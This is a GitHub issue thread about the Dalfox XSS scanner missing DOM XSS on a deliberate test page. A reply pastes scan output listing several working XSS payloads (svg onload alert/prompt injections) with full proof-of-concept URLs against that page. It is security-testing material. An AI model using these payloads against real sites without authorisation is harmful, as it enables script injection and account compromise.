github-actions[bot]
commented
3 years ago Thank you for your first issue report :D
Closed dinosn closed 3 years ago
github-actions[bot]
commented
3 years ago Thank you for your first issue report :D
dinosn
commented
3 years ago The latest version detects the XSS with no issue,
_..._
.' .::::. __ _ _ ___ _ __ __
: :::::::: | \ / \ | | | __/ \\ V /
: :::::::: | o ) o || |_ | _( o )) (
'. '::::::' |__/|_n_||___||_| \_//_n_\
'-.::''
Parameter Analysis and XSS Scanning tool based on golang
Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul
[*] Using single target mode
[*] Target URL: http://brutelogic.com.br/xss.php
[*] Vaild target [ code:200 / size:1727 ]
[*] Using dictionary mining option [list=GF-Patterns] πβ
[*] Using DOM mining option π¦β
[*] Start BAV(Basic Another Vulnerability) analysis / [sqli, ssti, OpenRedirect] π
[*] Start parameter analysis.. π
[*] Start static analysis.. π
[*] BAV analysis done β
[I] Found 5 testing point in DOM Mining
[*] Static analysis done β
[*] Parameter analysis done β
[I] Content-Type is text/html; charset=UTF-8
[I] Access-Control-Allow-Origin is *
[I] Reflected b1 param => Injected: /inATTR-double(1) > ] { $ ` + - = [ ) ; " ' . ( : < | } ,
25 line: <input type="text" name="b1" value="Dal
[I] Reflected b2 param => Injected: /inATTR-single(1) > $ [ { ` " ' ; } = ] ( : + | - , < ) .
31 line: <input type="text" name="b2" value='Dal
[I] Reflected b3 param => Injected: /inATTR-double(1) + { | ; = [ ) - $ ' ( } : < " ] ` , .
37 line: <input type="text" name="b3" value="Dal
[I] Reflected b4 param => Injected: /inATTR-single(1) + ; , " $ ( = : < ` ' ] - . [ } { | )
43 line: <input type="text" name="b4" value='Dal
[*] Generate XSS payload and optimization.Optimization.. π
[*] Start XSS Scanning.. with 513 queries π‘
[V] Triggered XSS Payload (found DOM Object): b4='><svg/class='dalfox'onLoad=alert(45)>
[POC][V][GET] http://brutelogic.com.br/xss.php?b4=%27%3E%3Csvg%2Fclass%3D%27dalfox%27onLoad%3Dalert%2845%29%3E
[V] Triggered XSS Payload (found DOM Object): b2='"><svg/class=dalfox onload=alert()//
31 line: t" name="b2" value=''"><svg/class=dalfox onload=alert(&#
[POC][V][GET] http://brutelogic.com.br/xss.php?b2=%27%22%3E%3Csvg%2Fclass%3Ddalfox+onload%3D%26%2397%26%23108%26%23101%26%23114%26%2300116%26%2340%26%2341%26%23x2f%26%23x2f
[V] Triggered XSS Payload (found DOM Object): b1="><svg/OnLoad="`${prompt``}`" class=dalfox>
25 line: t" name="b1" value=""><svg/OnLoad="`${prompt``}`" class=dalfox>">
[POC][V][GET] http://brutelogic.com.br/xss.php?b1=%22%3E%3Csvg%2FOnLoad%3D%22%60%24%7Bprompt%60%60%7D%60%22+class%3Ddalfox%3E
[V] Triggered XSS Payload (found DOM Object): b3="><svg/class="dalfox"onLoad=alert(45)>
[POC][V][GET] http://brutelogic.com.br/xss.php?b3=%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E
[*] Finish :DI'm closing the bug :)
Hi,
Whilst testing for DOM XSS cases using http://brutelogic.com.br/xss.php as example, I noticed that none of the parameters were identified.
Dalfox
Using a different tool the xss in the DOM are visible at the following locations,
Environment